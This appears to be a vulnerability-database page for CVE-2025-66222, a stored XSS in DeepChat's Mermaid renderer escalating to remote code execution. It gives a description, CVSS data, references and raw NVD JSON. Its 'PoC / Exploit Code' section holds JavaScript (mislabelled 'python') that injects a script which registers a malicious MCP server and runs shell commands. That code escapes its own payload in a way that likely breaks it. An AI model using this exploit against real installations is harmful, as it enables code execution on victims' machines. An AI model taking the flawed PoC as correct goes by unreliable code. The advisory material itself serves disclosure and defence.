CVE-2025-66222

Description

DeepChat is a smart assistant uses artificial intelligence. In 0.5.0 and earlier, there is a Stored Cross-Site Scripting (XSS) vulnerability in the Mermaid diagram renderer allows an attacker to execute arbitrary JavaScript within the application context. By leveraging the exposed Electron IPC bridge, this XSS can be escalated to Remote Code Execution (RCE) by registering and starting a malicious MCP (Model Context Protocol) server.

CVSS Details

CVSS Score

9.6

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:thinkinai:deepchat:*:*:*:*:*:*:*:* - VULNERABLE

DeepChat <= 0.5.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-66222 PoC - DeepChat Mermaid XSS to RCE
// This PoC demonstrates the Stored XSS vulnerability in DeepChat's Mermaid renderer

// Stage 1: XSS Payload for Mermaid diagram
const xssPayload = `
<script>
// Malicious code to exploit Electron IPC bridge
const { ipcRenderer } = window.require ? window.require('electron') : window.electron || {};

if (ipcRenderer) {
    // Register malicious MCP server
    const maliciousServer = {
        name: 'evil-mcp-server',
        command: 'calc.exe',  // Target command to execute
        args: [],
        env: {}
    };
    
    // Use IPC to register and start the malicious server
    ipcRenderer.invoke('mcp:register', maliciousServer);
    ipcRenderer.invoke('mcp:start', 'evil-mcp-server');
    
    // Alternative: Direct command execution via Node.js integration
    const { exec } = window.require ? window.require('child_process') : {};
    if (exec) {
        exec('whoami > /tmp/pwned.txt');
    }
}
</script>
`;

// Mermaid syntax with embedded XSS
const mermaidPayload = `graph TD;
    A["User Input"] --> B["Mermaid Renderer"];
    B --> C["${xssPayload.replace(/</g, '&lt;').replace(/>/g, '&gt;')}"];
    C --> D["XSS Executed"];
    D --> E["IPC Bridge Access"];
    E --> F["Malicious MCP Server"];
    F --> G["RCE Achieved"];
`;

// Send the payload via DeepChat API (simulated)
async function exploit() {
    const targetUrl = 'http://target:3000/api/chat';
    const payload = {
        type: 'mermaid',
        content: mermaidPayload,
        roomId: 'victim-room-id'
    };
    
    // In real attack, this would be sent to the chat server
    // await fetch(targetUrl, {
    //     method: 'POST',
    //     headers: { 'Content-Type': 'application/json' },
    //     body: JSON.stringify(payload)
    // });
    
    console.log('PoC Payload:', mermaidPayload);
    console.log('XSS will execute when victim views the Mermaid diagram');
}

exploit();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-66222
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-66222
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-66222/
[4] VulDB https://vuldb.com/cve/CVE-2025-66222
[5] https://github.com/ThinkInAIXYZ/deepchat/commit/371ca7b42e3685aee6e3f0c61e85277ed1ff4db7
[6] https://github.com/ThinkInAIXYZ/deepchat/security/advisories/GHSA-v8v5-c872-mf8r

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-66222", "sourceIdentifier": "[email protected]", "published": "2025-12-03T19:15:58.237", "lastModified": "2025-12-05T15:37:59.973", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DeepChat is a smart assistant uses artificial intelligence. In 0.5.0 and earlier, there is a Stored Cross-Site Scripting (XSS) vulnerability in the Mermaid diagram renderer allows an attacker to execute arbitrary JavaScript within the application context. By leveraging the exposed Electron IPC bridge, this XSS can be escalated to Remote Code Execution (RCE) by registering and starting a malicious MCP (Model Context Protocol) server."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thinkinai:deepchat:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.5.0", "matchCriteriaId": "5FF85743-6B7D-45B0-96AC-FF0875064030"}]}]}], "references": [{"url": "https://github.com/ThinkInAIXYZ/deepchat/commit/371ca7b42e3685aee6e3f0c61e85277ed1ff4db7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ThinkInAIXYZ/deepchat/security/advisories/GHSA-v8v5-c872-mf8r", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}